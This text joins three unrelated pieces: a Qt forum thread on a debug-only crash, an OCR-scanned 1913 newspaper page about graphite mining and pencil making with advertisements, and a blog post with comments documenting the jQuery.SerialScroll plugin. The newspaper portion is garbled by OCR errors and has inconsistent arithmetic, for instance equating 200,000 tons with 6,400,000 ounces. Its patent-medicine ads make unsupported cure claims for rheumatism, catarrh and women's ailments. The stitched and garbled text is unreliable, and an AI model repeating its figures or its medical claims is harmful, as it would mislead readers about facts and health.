[SOLVED] Linux, Qt 5.2.1: C++/QML application crash only in debug mode Hi, I'm looking for advice / tips on how to debug this strange issue. My host/target system is Linux (Ubuntu 12.04LTS 64bits) and Qt5.2.1 1- the application (C++ & QML) compiled in release mode is running without any issue 2- the same application compiled in debug mode is crashing in the QApplication exec() method 3- the same application compiled in debug mode but started with valgrind is not crashing The backtrace is always the same, but doesn't give much information (at least to me)... __strlen_sse2 QCoreApplication::arguments() ?? ?? _SmcProcessMessage IceProcessMessage ... Thank you for help! Could you post full backtrace from a core file and your source code related to the backtrace. Unfortunately, I can't disclose the source code and it's a quite big project! It's running already on Win32 and OSX and we are porting it to Linux (desktop first and then, to a Freescale i.MX6 hardware). Anyway, I've finally found and fixed the issue! Early in the code, a factory instantiates a QApplication or QtSingleApplication with argc and argv as parameters. In debug mode, the "-qmljsdebugger=port:...,block" argument is added (but not in release mode, which explain why it doesn't crash). This argument is removed (by QApplication?) and argc/argv are updated accordingly. Because argc was not passed by reference to the factory, its value was wrong on return (+1 compared to the number of entries in argv) = crashes when Qt tries to get the length of a non-existant argument ! Glad to hear that the is resolved. Thank you for sharing your investigation results.
https://forum.qt.io/topic/39755/solved-linux-qt-5-2-1-c-qml-application-crash-only-in-debug-mode
CC-MAIN-2022-33
refinedweb
280
65.32
A simple database access component This is a generic component that can be used for database access. You can connect to any database with a valid connection string and pass any valid SQL statement. This Article Covers SQL Server all use components and databases these days. Hence, I thought, why not make a generic component that everybody can use? Yes, you can actually use this component for database access. You can connect to any database with a valid connection string and pass any valid SQL statement. The method DataReader takes two arguments: - DBString (the database connection string) - SQL (the SQL statement) The component returns to you an ADO DataReader, which you can databind to a ASP Datagrid. Here is the code for the component (DBAccess.cs): Namespace DBAccess { using System; using System.Data; using System.Data.ADO; public class DBRead { public ADODataReader DataReader(string DBStr,string strSQL) { // Create the connection ADOConnection oCn = new ADOConnection(DBStr); //Create the Command Object ADOCommand oCm = new ADOCommand(strSQL,oCn); //Open the connection oCn.Open(); //Create a null DataReader Object ADODataReader oDr ; //Execute the SQL Query oCm.Execute(out oDr); // Return the DataReader return oDr; } } } You can compile the above code with the following command: csc /r:System.Data.dll /t:library DBAccess.cs We have imported the System.Data NameSpace in our component, now we need to give its reference. Here is the ASP.NET code (Client.aspx): <%@Page protected void Submit_OnClick(Object s, EventArgs e) { // Create an instance of our component DBAccess.DBRead oDBr = new DBAccess.DBRead(); //Create a null DataReader ADODataReader oDr; // Use the DataReader Method of our component oDr = oDBr.DataReader(dbstr.Text,SQL.Text); // DataBind the DataReader with the DataGrid oDg.DataSource = oDr; oDg.DataBind(); } </script> <html> <head> <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0"> <meta name="CODE_LANGUAGE" Content="C#"> </head> <body> <form method="post" runat="server"> DB String : <asp:textbox<br/> SQL Query : <asp:textbox<br/> <asp:button <br/> <ASP:DataGrid id="oDg" runat="server" BackColor="#ccccff" BorderColor="black" ShowFooter="false" CellPadding=3 CellSpacing="0" Font-Size="9pt" HeaderStyle-BackColor="#aaafff" Headerstyle-font-bold /> </form> </body> </html> You don't have to separately compile the ASP.NET client. It automatically gets compiled with the first request. Happy coding! Source: DotNetExtreme.com Start the conversation
http://searchwindevelopment.techtarget.com/tip/A-simple-database-access-component
CC-MAIN-2017-04
refinedweb
377
51.04
WHat We Ov Published in Tho Keowee I tho Ai This is a story of lead pencils, electric lights, and graphite mines. Do you know that the lead in the pencils you use every day ls the pro duct of the earth's inferno of seve ral million years ago? And that tho carbons in the powerful electric lights that glow in our streets come from volcanoes that blazed centuries ago when the world was young? Unelo Sam's scientists have just com pleted an Investigation of graphite mining-sometimes called lead min ing-In the United States and the Old World, and the results of this Inquiry have developed many inter esting facts. Some of tho most interesting facts brought out In thiB inquiry were the few mines of graphite in the world, how artificial graphite or lead is made, and tho extraordinary manner in which it is mined in Ceylon, In dia. It is also explained how nature lays up great stores of lead for fu ture generations of school children. After making coal, it seems that na ture simply took ono step further and made graphite, for tho latter ls nearly pure carbon and was formed through the action of molten rock forced from the bowels of the earth. This rock, after being reduced to al most a fluid state by the tremend ous pressure in the center of the earth, was brought Into contact with coal. The coal was burned out through chemical actions and the graphite remained. A description by the scientists of a graphite bed in New Mexico will illustrate how nature goes about the job of making lead. "This is one of the few graphite mines in America. The graphite vein extends Into coal fields, which contain coke. In the early ages of the world molten rock was forced into the coal-bearing rocks In many places and formed na tural coke, but In some places, due to tho presence of certain chemicals, it formed graphite when it came in contact with tho coal. The coal was completely graphitized where the rock was forced into the coal bed. Some of these dcsj>osits contain 80 or 90 per cent pure graphite. This and artillclnl graphite are the materials most often used In tho manufacture of lead pencils." Every one speaks of a "lead" pen cil as though lt were really made of lead, but, as a matter of fact, there is no lead in a lead pencil. The heart or coro of a "lend" pencil, commonly known as lead. Is really graphite. It goes under three names-graphite, plumbago, and black lead. It Is known as graphite in scientific cir cles, plumbago by the custom house people, and lead by tho ordinary people. History of the lead Pencil. There is little real history to the lead pencil, lt probably goes back two or three centuries, but that, is all. Some old parchments have been found marked with lead ruling, but this must have been metallic lead. Le Moine, an authority of tho early days, speaks of documents marked -with graphite. Other writers have found papers evidently written with a piece of graphite inserted in the end of a stick. And this shows the evolution of the i>encil. The first pencil factory In America was founded by a school-girl. There was a graphito mine In England at that time called tho Barrowdale mine. A school-girl obtained some pieces of graphite and anticipated quite closely the pencil method of modern days. lu some way she crushed the graphite, either with a hammer or a stone, and then used Kum. mixing the two together. Then she cut an alder cylinder, filled It *1 Wood's Seeds For The Farm arid Garden. Our New Descriptive Catalog is fully up-to-date, giving descrip tion and tull information about the best and most profitable seeds to grow. It tells all about Grasses and Clovers, Seed Potatoes, Seed Oats, Cow Peas, Scja Beans, The Best Seed Corns and all other Farm and Garden Seeds. Wood's Seed Catalog has long been recognized as a stan dard authority on Seeds. Mailed on request; write for it T. W. WOOD & SONS, SEXDSMfLN, RICHMOND, VA. ye J& To Graphite. Mtdorfer, Chevy Chase, Md., and fourier by Permission of Lithor. ? with this gum and graphite, and thus produced tho first lead i>encil made In America. This took place In Danvers, Mass. Later a man by the name of Joseph W. Wade co-op erated with the girl, and together they made a number of '?ad \ enclls after the same fashion. The girl's name was not recorded. The Barrowdale mine In England was the source of the first graphite, and the pieces quarried were said to be In such form that they could be sawed and pressed Into the wood. Scientists say, however, that pieces of this kind were not very numerous. Later it occurred to a Frechman named Conto to powder the graphite and then combine the pulverized sub stance with a binding material. He worked on his scheme until he pro duced tho graphite part of the pen cil substantially as it is made now. Not much, however, was done with it, either by Conto or by any other Frenchman. Thc Germans then took it up, and while tho Frenchman was the real Inventor, to the Germans belongs the credit of working out and putting into its present shape the lead pencil as we know it to-day. The work of pencil-making is pic turesque. It is ingenious and at tractive, and tho method reflects raro mechanical talent. The num ber of raw materials used is between '40 and 50, and the whole world contributes to the assembling of these materials. Most of the pro cesses are done by automatic ma c ilnery. Tho Mines in Ceylon. Edson S. Bastin is Uncle Sam's scientist In tho geological survey at Washington, who has made a study of graphite for many years. In speak ing of mining graphite in Ceylon, Mr. Bastin said: "Athough their existence was known in early times and mentioned In print as early as 1681, the graph ite deposits of Ceylon were not ex ploited until some time betweer 1820 and 1830. Joseph Dixon ls sale to have imported a small quantity into the United States in 1829, bu it was not until 1834 that the Indus try assumed any commercial Import ance. From that time to this, as ? result of the growth of the metal In dustries and the great demand, tin industry has developed rapidly, untl at present graphite is subordinate ii value only to tea and the product of the cocoanut palm among the ex ports from tho island. "The graphite is mined cit he from the open pits or through verti cal shafts connected with under ground workings. The majority o mines are not deeper than 100 feet though a few go as deep as 400 o 500 feet. On account of the ?ieav; rainfall, water is one of the ebie obstacles in mining. In a few mine steam pumpa and hoists are em ployed, but as a mle the mining mc thods are still crude, the acme o mechanical ingenuity being roache In a windlass operated by flvo or si men to hoist the graphite in a soi of tub. The workmen usua'ly clim rough wooden ladders hundreds c feet long. The ladders are tied wit jungle ropes and rendered very sill pery by the graphite dust and wate so you can Imagine what a hazarc ons job it is. "The mineral as it comes from th pit., usually contains about 50 pc cent of Impurities, mostly In the fon of quartz and wallrock. It, ls ca ried in bags to a dressing shei where it is picked over by hand an the impurities reduced to 5 or l I>or cent. It is then packed in barre for transportation to Colombo c Calle. At these ports it ls unpack? and submitted to further treatmei known as 'curing.' The graphil aerchants have fenced yards < 'compounds' for the final prepara tlc of the graphite for the market. "In thc methods of 'curing* thei ls some diversity, but the first ste ls usually to set aside large lum] and pass the remainder through st tionary screens of several sizes i mesh. The large lump.-, and tl screened pieces are then broken wi small hatchets by Slngalese wom< to remove the coarse Impurities, BIM as quartz, and aro then rubbed up 1 hand on a piece of wet burial) and fl ally on a pieco of screen to gi tho a polish. Finally, various grad? coming from several mines or diffc lng In size or texture, aro blended meet the demands of purchasers, process requiring skill and long e perlence. Best Pencil? Made of a Blond, "The poor material is usually bot en to a powder with wooden mau or with beaters shaped like a rollin pin, and is then sorted into diff?re grades. In some establishments t poor grades are washed In a tub pit. In this procesa the mineral ls placed in saucer-shaped baskets, and by a circular 'paling' motion of the baskets under water the graphite particles are thrown off into the pit, while the heavier impurities, especial ly pyrite, remain behind. To separ ate the very tine material the pow dered graphite is placed In a basket looking like a large dustpan. The contents of the basket are thrown into the air, and the heavier par ticles fall back Into the basket, while the finer material ls blown forward and thrown on the floor. "The use of graphite in the manu facture, of pencils probably Is both its oldest and best known application. The industry In Germany and Eng land lu several centuries old, and many of the modern factories manu facture hundreds of varieties of pen-'j ells, yet the percentage of .graphite used for this purpose ls not large, being less than 10 per cent, of the world's production, and one author ity estimates lt as low as 4 per cent. "In this country the physical char acter of the graphite ls of great im portance. Crystallite graphite, how ever pure, would, If used alone, yield a 'lead' that would slip over paper without leaving more than a faint streak. Further, it is almost Im possible to grind the flake graphite into a powder of the finest grain re quired for tho better grades of pen cils. The better grades of graphite constitute the bulk of material used in pencil manufacture. For some of tho cheaper pencils only ono kind of graphite Is used, but the graphite for pencils of the better grades is a care ful blend of several kinds. Ono blend, for example, contains about one-third Ceylon graphite, one-third Bohemian, and one-third Mexican. The Ceylon graphite adds to the smoothness of the 'lead,' the Bohe mian adds blackness. "Graphite when used for pencils is mixed with carefully refined clay, which is usually imported from Ger many; no doftiestic clay has been found entirely suitable for pencil manufacture. The more graphite and the less clay the softer the pen cil; the less graphite and the more clay, tho harder the pencil. The cores of softer pencils are usually made larger than those of the harder ones in order to give them equal tensile I strength. For a pencil of medium hardness about one-third clay ls com monly used. The wet mixture of clay and graphite ls worked and re worked until it t? 00 pliable tTvK !' can be looped li . tvt In loose knots. An Ainerlcai lite Mine. "Up to a few ra .> .> American pencil manufacturer had to import his graphite from India or Bavaria. About twelve years ago a large deposit of amorphous graphite was discovered in Senora, Mexico. Tliis proved to be of excellent quality for pencil making and many other uses, and the American pencil trade now derives Its supply mainly from this source. Some Mexican graphite is also exported to European pencil manufacturers. "A use which has Increased rapidly In Importance within the last few years ls the manufacture of graphite paint, especially ror structural Iron and steel work. Much of tho graph ite used for this purpose is rather IRheumatism Neuralgia Sprains tins c. MAHOJOJT, of 2703 ic. st., W. Washington, 1). C., write? : " 1 suf fered with rheumatism for llvo years ami I have just got hold of your Lini ment, and ft hus dono mo so much good. My knees do not pulu and the swelling has gonn." Quiets the Nerves Mus. A .WEI DST AX, of 403 Thompson St., Maryville] Mo., writes : -" The nervo In my leg was destroyed llvo years ago and lott mo with a jerking at night so that 1 could not sloop. A friend told me to try your Liniment and now 1 could not do without it, I lind alter Ila uso 1 can sleep." SLOAN'S I LINIMENT ..Is a good Liniment. Ikeepiton hand all the time. My daughter sprained her wrist and used your Liniment, and it has not hurt her since." JOSEPH HATCHER, of Selma, N. o., It.K.l)., No. 4. At AH Dealers Price 25c, 60c, $1.00 Sloan's hook on lim - rn, catt IO, tlORS nnfl i? mil ry sect free. Address Dr. Earl S. Sloan, Boston, Mass. impure. Recent teste made In co operation between the office of public roads of the Department of Agricul ture and the Paint Manufacturers' Association, for the purpose of deter mining the relative merits of vari ous paint pigments as preservative coping for iron and steel, have yield ed results of great importance." What nature can do, man can sometimes do even better, and In the case of making graphite, a single company using the power generated by Niagara Falls, manufactures more artificial graphite than all the graph I ite produced by the mines of the United States. Hard coal with a small amount of ash ls the material usid, and the electric furnace does tho rest. HIS Pencils a Year for Each Mu num. The process Is a patented one. The product ls used largely as a lubri cant, known generally to the trade as plumbago, and the invention solves the problem of the supply of grease to make the world go round, so long at least as the coal supply lasts. Since 1904 this company has made fully 50,000,000 pounds of graphite at an average cost of 7 cents a pound, and a multitude of wheels of Industry have thus been made to spin more easily. Graphite greatly improves the oil as a lubri cant In every respect. Specially pre pared graphite will remain suspend ed In oil, displaying no tendency to sink, so that lt can be fed through automatic oil cups. When suspend ed in water this graphite will pass through the finest filter paper. The use of graphite In pencil mak ing is its oldest application, but the percentage of graphite used for this purpose is estimated as low as only .1 i>er cent of the total production. Still, with a world's production an nually of about 5.000,000 tons, it can be seen that allowing 4 per cent for pencils, 200,000 tons, there would be Borne pencils. Two hundred thou sand tons ls 6,400,000 ounces, and one ounce of graphite will make the "lead" for 20 pencils. This is 85 pencils for every man, woman and child In the world, Illiterate, heathen and all. Another use for graphite ls in the manufacture of crucibles for making flue grades of steel, brass and bronzes. The fa?t that graphite is nearly pure carbon, ls relatively in ert chemically, and volatilizes only at high temperature makes it of ex ceptional value for this purpose. phlte used in the Uni cruclbles is Imported he ic graphite mines of i the :al of the Ceylon pro .or t. , rpose not being found in any other locality. Stirring rods and other refractory products are made from material similar to that used in crucibles. Ancuer import ant use is as a rust preventive for stiactural iron and steel. Graphite is also largely used In various elec trical processes, for stove blacking, and as a protective coating for gun powder. The story of what is probably the oldest graphite mine within the Uni ted States is interesting. This mine became known to the whiles In 1633, and has been worked Intermittently for more than two centuries and a half. Recently a company has been incorporated which is now attempt ing to develop the property by the methods of modern mining engineer ing. Tho mine is located In the midst of a tract of land almost as wild and desolate to-day as it was a century ago near Sturbridge, Mass. The existence of this deposit of graphite was known early In tho col ony's history. About 163 3 one John Oldham, of Interesting memory In connection with the battle of Plym outh and the Massachusetts Bay Col onies, made a trip overland to Can ada, trading with the Indians on the way. He returned with a stock of hemp and beaver, and also brought along some "black lead" he found near Sturhrwlge The Indiana told him there wore great quantities of lt around that region. Governor Wlnthropo became Inter ested, and made a contract with a man named Keene for developing and working the mine. Wlnthrope was to advance 20 pounds In trad ing cloth and wampum in considera tion of which Keene agreed to go to tho Black Lead HUI with a number of men, and there to dig the black lead for which he was to be paid at "the rate of 40 shillings for every tonne when ho had digged up 20 tunnes of good merchantable black lead and put lt Into an house safe from the Indians." Tho venture came to nothing, and for a number of years tlie mine laj Idle, although schemes for Its devel opment were often under discussion It was thought then that the presenc< of graphite Indicated tho nearness ol silver, but no silver being found, the early colonists were much dlscour aged. The mine was so remote ll was hard to get workmen to go lute the wilderness or to stay there aftei they arrived. And so it remained for two centuries, until finally earl) In the nineteenth century the vain? of graphite became known, and th< Low Fa res TO THE Fertile Northwest ONE-WAY SPRING COLONIST TICKETS ON SALE DAILY MARCH 15 TO APRIL 18, 1013, to points in Western Montana, Idaho, Washington, Oregon, British Columbia. ROUND-TRIP HOMESEEKKRS* TICKETS ON SALE 1st and Sd TUESDAYS EACH MONTH to many points in the Northurst United States and Canada. Long limit and stop-overs. Travel on tho Northern Pacific Ry and connecting lines, to MINNESOTA, NORTH DAKOTA, MONTANA, IDAHO, WASHINGTON, OREGON, or to MANITOBA, SAS KATCHEWAN, ALBERTA, BRITISH COLUMBIA. Will send free illustrated literature about the North west United States and full Information about North ern Pacific rates of fare and service promptly upon re quest. It costs you nothing. Write to-day. W. W. NEAL, Traveling Pass'r Agent, 16 No. Pryor St., Atlanta, Ga. J. C. EATON, Traveling Immig. Agt., 40 E. 4th St., Cincinnati, O. | TYPEWRITER I SUPPLIES ll Ribbons - Paper - Carbons Wc can supply all Demands in Typewriter Papers Bonds, Heavy, Light and Feather Weight-any size, any quantity. High quality Carbon Paper always in stock? We represent locally a Standard Typewriter Ribbon Sales House, Best Silk Ribbons 75c. Fresh Ribbons for all machines with but little delay. Orders for Supplies Handled Promptly. KEOWEE COURIER, _ WALHALLA, S. C. FURS AND HIDES HIGHEST MARKET PRICE PAID FOR RAW FURS AND HIDES Wool on Commission. Writ* for lilt mention lay this ad. Established 1887 JOHN WHITE & CO. LOUISV?LL?"KY. mining of the mineral was under taken and carried on up to the pres ent time. How'? Th!?! ? We offer one hundred dollars re ward for any finan cially able to carry out any obliga tions made by his firm. National Bank of Commerce, Toledo, Ohio. Hall's Catarrh Cure ls taken inter nally, acting directly upon the blood and mucous surfaces of the system. Testimonials sent free. Price 75c. per bottle. Sold by all druggists. Take Hull's Family Pills for con stipation. adv. Six Stitches in His Heart. TO INDIA AS MISSIONARIES. Rev. a ,: Mrs. Hanson, of Cliarlotte, Sail February 15th. New Orleans, Jan. 25.-Making a half dozen stitches In a negro's heart while almost blinded by blood, which spurted from that organ, was part of a remarkable operation performed to day by Dr. J. A. Uanna, house sur geon of Charity Hospital. The pa tient, Lodge Leo, who was stabbed In a row with a woman, was con scious throughout the ordeal, and conversed with those about the table. Hospital attendants say he will live. There are more brands of cussed ness than there are brands of re ligion. (Anderson Mail.) Rev. and Mrs. J. W. Ranson, of Charlotte, N. C., are going to India as missionaries from tho Associate Reformed Presbyterian church. Rev. Mr. Ranson attended a meeting of tho board of foreign missions of the church, held at Due West a few days ago, at which time it was decided that he should take up the work. He will at once begin preparation for work in India and will sail for that country on February 15th. Much of the funds necessary for the expenses and maintenance of Mr. and Mrs. Ranson In the mission field was raised In Charlotte and In Mecklenburg county, North Caro lina, of which Mr. Ranson is a na tive. "llumau Bomb" Convicted. Los Angeles, Jan. 25.-Carl Rei delbach, the "human bomb," who terrorized the central police station several months ago, when he entered lt carrying an Infernal machine, and announced that he intended to blow everything into "kingdom come," was convicteu to-day on the charge of having -deposited dynamite in an In habited place. WOMAN'S TRIALS. The burdens a woman has to carry through life are many but they ean be lightened if she will turn to Dr. Pierce's Favorite Prescription. A soothing and strengthening nervine - subduing nervous excitability, prostration, hysteria, hot? flashes and the many symptoms which may be caused by distressing ills peculiar* to women. For those " dragging-down " pains or distress and for the derange? ments and irregularities the " Favorite Prescription " has had many thousands ol testimonials from people living in every part of America. Another important thing to every woman is that this medicine is made from efficient medicinal roots, without the use of alcohol, narcotics, or any injurious agents. Full list of ingredi ents given on bottle-wrapper and sworn to by Dr. R. V. Pierce-who is President of the Invalids' Hotel and Surgical Institute, at Buffalo, N. Y. Every woman is invited to write to this Institute and receive confidential and sound medical advice, entirely without cost from one who makes tho diseases of women his speoialty. "I can cheerfully rocommona vonr remedies, especlnlly your1 Favorite Prescription,' for ali female disorders," writes Mus.M. M. MOHKKI.I., of Bluff City, Tonn., Route 2. "During tho past seven years 1 suffered from pains In tho backend ovaries. Trlod many remedies but found only transient relief until I was persuaded by a friend to try Dr. Pierce's Favorite Proscription. After giving this romedy a fall ??rial. I found that lt would do Just what lt Is recommended to do. I used In all seven bottles. I cannot speak too highly of Dr. Plerco's romedles for all female derangements." Has. Mossau*. Dr. Pierce's Pleasent Pellet? regulate liver Ulm, xml | txt
http://chroniclingamerica.loc.gov/lccn/sn84026912/1913-02-05/ed-1/seq-2/ocr/
CC-MAIN-2017-43
refinedweb
4,006
71.04
NoticeI've pretty much stopped updating this blog, but the plugin development is still on-going. You can find the link to the Github project page at the bottom of the article. IntroductionThis doesn't have one definite purpose. It's generic and adaptable. You can certainly use it as a screen slider. That is, to sequentially navigate a group of screens. This plugin can also animate a text scroller in no time. It can definitely handle slideshows, the high customizability of the scrolling effect lets you create beautiful animations. You can even build an automatic news ticker! Three of these uses are exemplified in the demo. Remember, it's not restricted to these situations. It will take care of any collection of html elements that you want to scroll consecutively. Settings and customizationjQuery.SerialScroll gives you access to a lot of options. These are: targetThe element to scroll, it's relative to the matched element. If you don't specify this option, the scrolled element is the one you called serialScroll on. eventon which event to react (click by default). startfirst element of the series (zero-based index, 0 by default). stephow many elements to scroll each time. Use a negative number to go on the other way. lockif true(default), the plugin will ignore events if already animating. Then animations can't be queued. cycleif true, the first element will be shown after going over the last, and the other way around. stopif true, the plugin will stop any previous animations of the element, to avoid queuing. forceif true, an initial scroll will be forced on start. jumpif true, the specified event can be triggered on the items, and the container will scroll to them. itemsselector to the items(relative to the scrolled element). prev(optional)selector to the 'previous' button. next(optional)selector to the 'next' button. lazyif true, the items are collected each time, allowing dynamic content(AJAX, AHAH, jQuery manipulation, etc). intervalIf you specify a number, the plugin will add auto scrolling with that interval. constantShould the speed remain constant, no matter how many items we scroll at once ? (true by default). navigationOptionally, a selector to a group of elements, that allow scrolling to specific elements by index. Can be less than the amount of items. excludenewIf you want the plugin, to stop scrolling before the actual last element, set this to a number, and that amount of items is ignored counting from the end. This is useful if you show many items simultaneously, in that case, you probably want to set this option to the amount of visible items - 1. onBeforeA function to be called before each scrolling. It receives the following arguments: event object, targeted element, element to be scrolled, collection of items and position of the targeted element in the collection. The scope(this) will point to the element that got the event. If the function returns false, the event is ignored. Check its demo to see all of them. The option 'target'This option is a new addition, included since 1.2.0. Before, you needed to call the plugin once for each scrolled element. When this option is specified, the matched elements are no longer the scrolled elements, but a container. In this case, the selectors of prev, next, navigation and target will be relative to this container, allowing you to call SerialScroll on many elements at once. External manipulation, event triggeringjQuery.SerialScroll automatically binds 3 events to the containers. These are: prev.serialScrollScrolls to the previous element. next.serialScrollScrolls to the next element. goto.serialScrollScrolls to the specified index, starts with 0. start.serialScroll(Re)starts autoscrolling. stop.serialScrollStops the autoscrolling. notify.serialScrollUpdates the active item. $(container).trigger( 'prev' ); $(container).trigger( 'next' ); $(container).trigger( 'goto', [ 3 ] ); $(container).trigger( 'start' ); $(container).trigger( 'stop' ); $(container).trigger( 'notify', [ 4 ] );'notify' also accepts a DOM element(item), or any of its descendants. $(container) is the element that gets scrolled each time. If you specified a 'target', then that element, else, the element you called the plugin on. Note that to use 'start' and 'stop' you need to use the option 'interval' first. If your container element already has any of these event names bound(odd!), then just add the namespace when you trigger. You probably won't need to deal with these events, but if so, this is how. What makes jQuery.SerialScroll so special ?This plugin has many positive features, of course, it won't fit everyone's needs. That's impossible. Small FootprintThis plugin is tiny, as said before, it requires jQuery.ScrollTo. Both plugins together, take less than 3.5kb minified. If by chance, you decide to include jQuery.LocalScroll, the 3 of them require less than 5kb. Including this plugin is not a bad idea, it can be used, instead of the option 'navigation' to build a widget with sequential and random scrolling. Highly customizableThis plugin has many settings to customize, in addition, it can use jQuery.ScrollTo's settings. That makes 27 different options! If you take a while to analyze them all, you can make your work really unique. Accessible, degrades gracefullyProbably many will automatically skip this part, shame on you! If you make sure non-javascript users will see the scrollbars, then they can perfectly navigate your content. You can show the scrollbars only for these few users, easily, using css/js. This is one of the main differences with many similar scripts, they generate the content and the styling using javascript. AdaptablejQuery.SerialScroll won't alter the html or styles at all. You are in control of the styles and content of your collections. You don't need the plugin to decide what html to use, or how many items to show simultaneously, and you can safely change that yourself, the plugin will always work. The items don't need to have fixed size, nor to be aligned. SerialScroll will scroll from one to the other, no matter what. If you want a plugin with premade styles or automatic generation of html, then you should consider any of jQuery carousels. Generic and reusableFinally, as mentioned before, this plugin can be used for many different situations and doesn't have one specific application. 134 comments: Excellent tutorials and examples! I've been trying to do something like this myself! Okay, that's pretty sweet. Thanks so much for your great contributions, Ariel! I have a collection of objects to scroll and this plugin works perfectly, except for one catch. Namely, the collection of objects can be re-ordered. If the user reorders the scrollable items scrolling then jumps to where they used to be instead of where they are now. Is there a reset() I am missing, or how we I detach and reattach it after reordering? Thanks, Dennis I am rereading my earlier post and realized I forget to ask if there is a way, in the onBefore method, to exit without causing the scrolling to advance. Thanks again. Hi motobass The first thing can be achieved with a little change, sacrificing some perfomance but that shouldn't be so tragic. The second one can also be added, easily. Please add both as feature requests here: I'll try to add that to a new release, ASAP. Cheers Hi motobass I added a new release (1.0.1) which includes both features. If the 'onBefore' returns false, the event is ignored. And if the new option 'lazy' is true, the items can be safely added/removed/reordered. Cheers I have an unordered list and I'm using serialScroll to go back and forth to its list items. The scroll is triggered by two links. Now, what I want is that when the scroll reaches the first LI element to hide the back trigger link [ as there is no where to go back ]. The same way with next link: if I reach the end of LI, I want to hide the next link. Any way to read the current displayed LI element or a way to achieve this? Hi Stefan But I'm planning to add a specific callback when you reach the edge. But for now, you can handle your situation with the callbacks 'onBefore' or 'onAfter'. Both get as one argument, the element you scrolled to. So you keep in a variable, the collection of items. Then you do: var index = $the_items.index(elem). So you now have the index of the item. If it's 0, you hide the 'prev'. If it's $the_items.length - 1, you hide the 'next'. Don't forget to show them back after. I'll update the post once I add a release. Cheers I forgot to add... You know there's a 'cycle' option right ? it will make the list circular. So when it reaches the limit, it pulls back. Ariel, thank you so much for getting back to me! I forgot to thank you for your work! These plugins of yours are amazing! I am aware of cycle option, but this is not what I wanted. Instead, I was looking for and index, a variable which holds the current LI index. I will tackle this path! Thank you! You should add the possibility of calling the 'slide' from outside of the scope of the object itself. Like for example when you have the slide and a navigation menu as well where clicking an item in the menu would slide to the corresponding item in the slider. You can of course simulate this with the onBefore and onAfter methods but then the next/previous in the actual slider won't be in sync anymore... Just a thought... My best shot was: $("#sections li:first").attr("id","first"); $("#sections li:last").attr("id","last"); Then: onAfter:function( elem ){ var currentView = $(elem).attr("id"); if ( currentView == "first" ) { $("#arrow-left a").fadeOut("fast"); } else { $("#arrow-left a").fadeIn("slow"); } if( currentView == "last" ) { $("#arrow-right a").fadeOut("fast"); } else { $("#arrow-right a").fadeIn("slow"); } } Maybe it is not very elegant, but it works and that is what's important for me in this stage. Ariel, thanks again for pointing me to the right direction! @stefan I'm glad you solved it, I was think of an index-based check, but that option if very feasible. I'll add the actual index as 4th or 3rd argument of the onBefore, and possibly a specific event 'onReachLimit' or something like that. @laddi Your suggestion seems pretty reasonable. I'll see what I can do for the next release. Note that for the specific case you mentioned, in case you are interested, you can use jQuery.LocalScroll. It also uses jQuery.ScrollTo and they can be safely combined. The overhead will be really small. Could any of you (or both) add these things as feature requests ? Thanks! @stefan and laddi Added a new release(1.1.0). Now it's possible to manipulate the animations from outside, using the custom events of the container(prev,next,goto). Also added 2 arguments to the onBefore that make the check stefan needed, really easy to do. Finally, added an option 'interval' for autoscrolling. Cheers, check the demo, it's updated. Excellent work, man! I created the feature request already but you can then just ignore that... ;) Again, great stuff! :D Sorry for the delay, this is the page where I used your plugin and modified it ( the logos with the arrows ). The problem was that it always scrolls a fixed number of items and if you have ( items % steps != 0 ) then you will have some emtpy space on the last step. If you want I can give you the modified source (I posted the modified section on the last comment that was deleted). Thanks. Hi Sorry, I thought you agreed with me as you weren't replying. I really to try to keep this clean. Do you have any kind of IM ? we can discuss your code more easily. Cheers Thank you Ariel. Very nice plugin. One problem I have is that I can't seem to stop a rotation in progress. It stops for a little bit and then continues on. I'm having it auto scroll on load. I'm using $(container).stop() Anything I'm missing? Hi David Use $('#pane').trigger('stop'); and $('#pane').trigger('start',[intv]) Where $('#pane') is the container that gets scrolled, I'll add this to the docs right away. Please get 1.1.1. Wow. Thanks for the quick response Ariel! Your rock. Works like a charm. Hi Ariel, I am trying to use your plug in to manage a horizontal div of images. The div structure is pretty simple. There is a container div, a clipping div, and an items div that is sized width-wise to hold all the images. I am able to scroll without any problems. However, if I use goto to jump to a position, I get somewhat unexpected behavior. Specifically, if I 'goto' the last element in the list, I then have to hit 'prev' twice before the images start scrolling again. I unfortunately don't have a public site to point you to but thought you might know off hand what the problem is. By the way, I think the problem has to do with the fact that the last element can not scroll all the way to the left most position since it is at the end of the div (which is the effect I need). So it then takes several 'prev' operations to get everything lined up again. Hi Edward Indeed that is the problem, while other similar plugins ask you to specify item size, or a certain amount of items to show each time, SerialScroll is more unrestricted. One way to make this work, if it fits you, is to set the step, to the amount of items you are showing each time, so you don't get to see less items and you don't get stuck. I wanted to make the plugin aware of the end, but that seems to require lots of code with so little restrictions. You could also play with the option 'offset'. Cheers, you can contact me by email if you want. Hi Ariel, Thanks for the fast reply. I think the answer for what I'm trying to do will be to make the list circular with the 'lazy' option on so I can ensure the user can always move freely in both directions. My thinking is that I can double my list up, then check to see when the last element is at the start of my viewport and if so, adjust the set of items accordingly. I'll let you know how it goes. Thanks for the excellent plugin and the support. Our site should be up soon... Hi Edward What you plan to do, is something I feared from adding to the core, as getting into cloning can only bring trouble. I'm interested though in seen how you implement it, let me know when you have it ready :) Cheers There shouldn't be any need for that, unless you want it to scroll less than step when you are close to the limit. Right now, it will ignore if not cycling, or go to the last otherwise. Hi, Been looking around for something like this, great work! In the absence of a forum I wondered if you could answer a quick question: Is it possible to control 2 different containers with 1 external click (link)? To explain: I am trying to develop a timeline application where one container shows page thumbnails (3 whole pages + 2 half pages either side) and the other container shows the larger version of the thumbnail that appears in the centre of the first container. I would like to control both containers with a series of links (along the bottom of the browser window) that correspond to the #id of each thumbnail (ideally I'd like to display the id in the query string depending on what link was clicked). Is this possible, if so how? PS: I can point you to a mocked up version if it helps you to understand my ramblings! Hi Jock, I do understand. You can certainly scroll 2 containers together. You just match both with one selector when you call the plugin, f.e: $('#one,#two').serialScroll(... or with the alternate (new) way $('#cont').serialScroll({ target: '#one,#two' }); I'd advice you to check LocalScroll I think that's what you are looking for. Cheers Wow, That's what I call a fast response! I will give it a go although I am not an expert in this language. If I have any other questions, do you mind if I post another comment? PS: If you created the page for me, I could pay you for your time via PayPal or something. I'm on a bit of a deadline with this one. Thanks again, you're a star! You can surely post more comments, or contact me to my email (it's in the plugin). I can't do it for you right now, sorry :) Cheers You were right, I was talking about Serial Scroll. As I told I am busy making a carousel but I don't want the prev/next buttons to be visible when the first/last item is visible. It should be working like jcarousel or accessible news slider plugin where the buttons are disabled or not visible. But with SerailScroll you can add more features more easy than that 